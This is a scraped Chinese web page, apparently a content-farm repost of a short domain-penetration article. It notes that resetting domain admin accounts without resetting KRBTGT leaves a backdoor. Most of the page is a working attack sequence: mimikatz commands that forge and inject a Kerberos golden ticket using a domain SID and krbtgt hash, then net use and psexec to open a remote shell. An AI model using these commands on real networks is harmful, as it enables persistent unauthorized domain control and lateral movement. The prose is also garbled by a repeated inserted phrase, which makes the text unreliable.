当前位置:首页 >焦点 >域渗透的金之钥匙 仅仅重置域管理员账号

域渗透的金之钥匙 仅仅重置域管理员账号

2024-06-28 21:01:37 [百科] 来源:避面尹邢网

域渗透的域渗钥匙金之钥匙

作者:mickey 安全 网站安全 如果域控被入侵,仅仅重置域管理员账号,域渗钥匙不重置KRBTGT账号,域渗钥匙等于是域渗钥匙给黑客留了一个后门。域渗钥匙
C:\Users\hydra>net group "domain admins" /domain
C:\Users\hydra>whoami /user

mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
E:\>net use \\WIN-0DKN2AS0T2G\c$E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
责任编辑:蓝雨泪 来源: 乌云知识库 渗透域渗透内网渗透

(责任编辑:焦点)

    推荐文章
    热点阅读